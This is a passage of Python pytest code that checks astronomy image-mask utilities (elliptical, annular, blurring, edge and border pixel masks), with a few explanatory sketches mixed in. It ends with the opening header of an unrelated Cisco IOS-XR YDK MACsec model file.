major_axis_radius_arcsec=1.5,
axis_ratio=0.9, phi=0.0)
assert (mask == np.array([[True, False, False, True],
[False, False, False, False],
[True, False, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 4), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.1, phi=180.0)
assert (mask == np.array([[True, True, True, True],
[False, False, False, False],
[True, True, True, True]])).all()
    def test__3x3_mask__shifts_downwards__right__diagonal(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
major_axis_radius_arcsec=4.8, axis_ratio=0.1, phi=45.0, centre=(-3.0, 0.0))
assert (mask == np.array([[True, True, True],
[True, True, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
major_axis_radius_arcsec=4.8, axis_ratio=0.1, phi=45.0, centre=(0.0, 3.0))
assert (mask == np.array([[True, True, True],
[True, True, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
major_axis_radius_arcsec=4.8, axis_ratio=0.1, phi=45.0, centre=(-3.0, 3.0))
assert (mask == np.array([[True, True, True],
[True, True, True],
[True, True, False]])).all()
class TestMaskEllipticalAnnular(object):
def test__mask_inner_radius_zero_outer_radius_small_medium_and_large__mask__all_circular_parameters(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3,3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=0.5, outer_axis_ratio=1.0, outer_phi=0.0)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.81, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=1.0, outer_phi=0.0)
assert (mask == np.array([[True, False, False, True],
[False, True, True, False],
[False, True, True, False],
[True, False, False, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.5, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=3.0, outer_axis_ratio=1.0, outer_phi=0.0)
assert (mask == np.array([[False, False, False],
[False, True, False],
[False, False, False]])).all()
def test__elliptical_parameters_and_rotations_work_correctly(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3,3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=0.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
inner_major_axis_radius_arcsec=0.0, inner_axis_ratio=1.0, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=45.0)
assert (mask == np.array([[True, True, False],
[True, False, True],
[False, True, True]])).all()
def test__large_mask_array__can_see_elliptical_annuli_form(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.5, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, False, True, False, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=2.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.5, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.8, outer_phi=90.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, False, True, True],
[True, False, False, False, True],
[True, False, True, False, True],
[True, False, False, False, True],
[True, True, False, True, True],
[True, True, True, True, True]])).all()
def test__shifts(self):
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0,
centre=(-1.0, 0.0))
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, False, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0,
centre=(0.0, 1.0))
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True],
[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True],
[True, True, True, True, True]])).all()
mask = mask_util.mask_elliptical_annular_from_shape_pixel_scale_and_radius(shape=(7,5), pixel_scale=1.0,
inner_major_axis_radius_arcsec=1.0, inner_axis_ratio=0.1, inner_phi=0.0,
outer_major_axis_radius_arcsec=2.0, outer_axis_ratio=0.1, outer_phi=90.0,
centre=(-1.0, 1.0))
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True],
[True, True, True, True, True],
[True, True, True, False, True],
[True, True, True, False, True]])).all()
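The expected arrays above pin down a specific geometric convention: arc-second coordinates centred on the image with y increasing upwards, `phi` measured counter-clockwise from the positive x-axis, an inclusive annulus (on the inner boundary counts as outside it, on the outer boundary counts as inside it), and a `(y, x)` centre offset. As a reading aid, here is a minimal sketch that reproduces the first test case; the function name and the conventions are inferred from the assertions, not taken from the library's implementation:

```python
import numpy as np

def elliptical_annular_mask_sketch(shape, pixel_scale,
                                   inner_r, inner_q, inner_phi,
                                   outer_r, outer_q, outer_phi,
                                   centre=(0.0, 0.0)):
    """Sketch (assumed conventions): a pixel is unmasked (False) when its
    elliptical radius is >= inner_r for the inner ellipse and <= outer_r
    for the outer ellipse."""
    mask = np.full(shape, True)
    cy, cx = (shape[0] - 1) / 2.0, (shape[1] - 1) / 2.0
    for row in range(shape[0]):
        for col in range(shape[1]):
            # Arc-second coordinates, y increasing upwards, relative to centre.
            y = (cy - row) * pixel_scale - centre[0]
            x = (col - cx) * pixel_scale - centre[1]

            def r_ell(q, phi_deg):
                # Rotate into the ellipse frame, then stretch the minor axis.
                phi = np.radians(phi_deg)
                x_r = x * np.cos(phi) + y * np.sin(phi)
                y_r = y * np.cos(phi) - x * np.sin(phi)
                return np.sqrt(x_r ** 2 + (y_r / q) ** 2)

            if r_ell(inner_q, inner_phi) >= inner_r and \
               r_ell(outer_q, outer_phi) <= outer_r:
                mask[row, col] = False
    return mask
```

Running it with the first test's parameters reproduces the expected (7, 5) array above.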
class TestMaskBlurring(object):
def test__size__3x3_small_mask(self):
mask = np.array([[True, True, True],
[True, False, True],
[True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False],
[False, True, False],
[False, False, False]])).all()
def test__size__3x3__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, True, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])).all()
def test__size__5x5__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
assert (blurring_mask == np.array([[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, True, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True]])).all()
def test__size__5x3__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 3))
assert (blurring_mask == np.rot90(np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, False, True, False, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]]))).all()
def test__size__3x5__large_mask(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 5))
assert (blurring_mask == np.rot90(np.array([[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, True, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True]]))).all()
def test__size__3x3__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False],
[False, True, False, True, False, True, False],
[False, False, False, True, False, False, False],
[True, True, True, True, True, True, True],
[False, False, False, True, False, False, False],
[False, True, False, True, False, True, False],
[False, False, False, True, False, False, False]])).all()
def test__size__5x5__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
assert (blurring_mask == np.array([[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[False, False, False, False, False, False, False, False,
False]])).all()
def test__size__5x3__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 3))
assert (blurring_mask == np.rot90(np.array([[True, True, True, True, True, True, True, True, True],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[True, True, True, True, True, True, True, True, True],
[False, False, False, False, False, False, False, False, False],
[False, False, True, False, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[True, True, True, True, True, True, True, True, True]]))).all()
def test__size__3x5__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 5))
assert (blurring_mask == np.rot90(np.array([[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, True, False, True, False, True, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, True, False, True, False, True, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False,
True]]))).all()
def test__size__3x3__even_sized_image(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True],
[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True]])).all()
def test__size__5x5__even_sized_image(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
assert (blurring_mask == np.array([[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, False, False, False, False, False],
[True, True, True, False, False, False, False, False],
[True, True, True, False, False, True, False, False],
[True, True, True, False, False, False, False, False],
[True, True, True, False, False, False, False, False]])).all()
def test__size__3x3__rectangular_8x9_image(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False, True, True],
[False, True, False, True, False, True, False, True, True],
[False, False, False, True, False, False, False, True, True],
[True, True, True, True, True, True, True, True, True],
[False, False, False, True, False, False, False, True, True],
[False, True, False, True, False, True, False, True, True],
[False, False, False, True, False, False, False, True, True],
[True, True, True, True, True, True, True, True, True]])).all()
def test__size__3x3__rectangular_9x8_image(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True],
[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])).all()
def test__size__5x5__multiple_points__mask_extends_beyond_edge_so_raises_mask_exception(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True]])
with pytest.raises(exc.MaskException):
mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
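The blurring-mask tests above all encode one rule: every masked (True) pixel that falls inside the `psf_shape` window of an unmasked (False) pixel joins the blurring region. A minimal sketch of that rule (the name and the edge handling are assumptions; unlike the real routine, this clips at the image edge instead of raising `MaskException`):

```python
import numpy as np

def blurring_mask_sketch(mask, psf_shape):
    """Mark as False every True pixel of `mask` lying within the
    psf_shape window of any False pixel."""
    ky, kx = psf_shape[0] // 2, psf_shape[1] // 2
    rows, cols = mask.shape
    blurring = np.full(mask.shape, True)
    for y in range(rows):
        for x in range(cols):
            if mask[y, x]:
                continue  # only unmasked pixels spread blurring
            for yy in range(max(0, y - ky), min(rows, y + ky + 1)):
                for xx in range(max(0, x - kx), min(cols, x + kx + 1)):
                    if mask[yy, xx]:
                        blurring[yy, xx] = False
    return blurring
```

For the first 3x3 case it yields False everywhere except the unmasked centre, matching the assertion above.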
class TestGridToMaskedPixel(object):
def test__setup_3x3_image_one_pixel(self):
mask = np.array([[True, True, True],
[True, False, True],
[True, True, True]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[1, 1]])).all()
def test__setup_3x3_image__five_pixels(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[0, 1],
[1, 0], [1, 1], [1, 2],
[2, 1]])).all()
def test__setup_3x4_image__six_pixels(self):
mask = np.array([[True, False, True, True],
[False, False, False, True],
[True, False, True, False]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[0, 1],
[1, 0], [1, 1], [1, 2],
[2, 1], [2, 3]])).all()
def test__setup_4x3_image__six_pixels(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True],
[True, True, False]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[0, 1],
[1, 0], [1, 1], [1, 2],
[2, 1],
[3, 2]])).all()
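The grid-to-pixel assertions above follow row-major order: the i-th unmasked (False) pixel, scanning rows top to bottom and columns left to right, maps to its (row, col) pair. `np.argwhere` scans in exactly that order, so a one-line sketch (name assumed) reproduces the expected mapping:

```python
import numpy as np

def grid_to_pixel_sketch(mask):
    # np.argwhere visits entries in row-major (C) order, matching the
    # 1D masked-grid ordering the assertions above expect.
    return np.argwhere(~mask)
```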
class TestEdgePixels(object):
def test__7x7_mask_one_central_pixel__is_entire_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0])).all()
def test__7x7_mask_nine_central_pixels__is_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 5, 6, 7, 8])).all()
def test__7x7_mask_rectangle_of_fifteen_central_pixels__is_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 5, 6, 8, 9, 11, 12, 13, 14])).all()
def test__8x7_mask_add_edge_pixels__also_in_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, False, False, False, False, False, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12, 14, 15, 16, 17])).all()
def test__8x7_mask_big_square(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 5, 9, 10, 14, 15, 19, 20, 24, 25, 26, 27, 28, 29])).all()
def test__7x8_mask_add_edge_pixels__also_in_edge(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, True, True, False, True, True, True, True],
[True, True, False, False, False, True, True, True],
[True, True, False, False, False, True, True, True],
[True, False, False, False, False, False, True, True],
[True, True, False, False, False, True, True, True],
[True, True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12, 13, 14])).all()
def test__7x8_mask_big_square(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 5, 9, 10, 14, 15, 19, 20, 21, 22, 23, 24])).all()
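The edge-pixel tests above single out, in 1D masked-grid order, every unmasked pixel with at least one masked 8-neighbour (the centre of a filled square has none, so it is excluded). A sketch of that rule; the name is assumed, and treating out-of-bounds neighbours as masked is a guess the tests never exercise:

```python
import numpy as np

def edge_pixels_sketch(mask):
    rows, cols = mask.shape

    def masked(yy, xx):
        # Out-of-bounds neighbours are treated as masked (assumption: the
        # tests never push the unmasked region to the image border).
        return not (0 <= yy < rows and 0 <= xx < cols) or mask[yy, xx]

    edge, index = [], 0
    for y in range(rows):
        for x in range(cols):
            if mask[y, x]:
                continue
            # An unmasked pixel is an edge pixel if any 8-neighbour is masked.
            if any(masked(y + dy, x + dx)
                   for dy in (-1, 0, 1) for dx in (-1, 0, 1)
                   if (dy, dx) != (0, 0)):
                edge.append(index)
            index += 1
    return np.array(edge)
```

On the nine-central-pixels case this returns every index but the centre's, matching the assertion above.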
class TestBorderPixels(object):
def test__7x7_mask_one_central_pixel__border_is_central_pixel(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0])).all()
def test__7x7_mask_three_pixel__border_pixels_all_of_them_is_central_pixel(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, False, True, True, True, True],
[True, True, True, True, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2])).all()
def test__7x7_mask_nine_central_pixels__central_pixel_is_not_border_pixel(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 5, 6, 7, 8])).all()
def test__7x7_annulus_mask__inner_pixels_excluded(self):
mask = np.array([[False, False, False, False, False, False, False],
[False, True, True, True, True, True, False],
[False, True, False, False, False, True, False],
[False, True, False, True, False, True, False],
[False, True, False, False, False, True, False],
[False, True, True, True, True, True, False],
[False, False, False, False, False, False, False]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
def test__same_as_above_but_8x7_annulus_mask__true_values_at_top_or_bottom(self):
mask = np.array([[False, False, False, False, False, False, False],
[False, True, True, True, True, True, False],
[False, True, False, False, False, True, False],
[False, True, False, True, False, True, False],
[False, True, False, False, False, True, False],
[False, True, True, True, True, True, False],
[False, False, False, False, False, False, False],
[ True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
mask = np.array([[ True, True, True, True, True, True, True],
[False, False, False, False, False, False, False],
[False, True, True, True, True, True, False],
[False, True, False, False, False, True, False],
[False, True, False, True, False, True, False],
[False, True, False, False, False, True, False],
[False, True, True, True, True, True, False],
[False, False, False, False, False, False, False]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
def test__same_as_above_but_7x8_annulus_mask__true_values_at_right_or_left(self):
mask = np.array([[False, False, False, False, False, False, False, True],
[False, True, True, True, True, True, False, True],
[False, True, False, False, False, True, False, True],
[False, True, False, True, False, True, False, True],
[False, True, False, False, False, True, False, True],
[False, True, True, True, True, True, False, True],
[False, False, False, False, False, False, False, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
mask = np.array([[True, False, False, False, False, False, False, False],
[True, False, True, True, True, True, True, False],
[True, False, True, False, False, False, True, False],
[True, False, True, False, True, False, True, False],
[True, False, True, False, False, False, True, False],
[True, False, True, True, True, True, True, False],
[True, False, False, False, False, False, False, False]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()


# File: cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_macsec_ctrlr_oper.py
# Repo: tkamata-test/ydk-py (licenses: ECL-2.0, Apache-2.0)
""" Cisco_IOS_XR_macsec_ctrlr_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR macsec\-ctrlr package operational data.
This module contains definitions
for the following management objects\:
macsec\-ctrlr\-oper\: Macsec controller data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
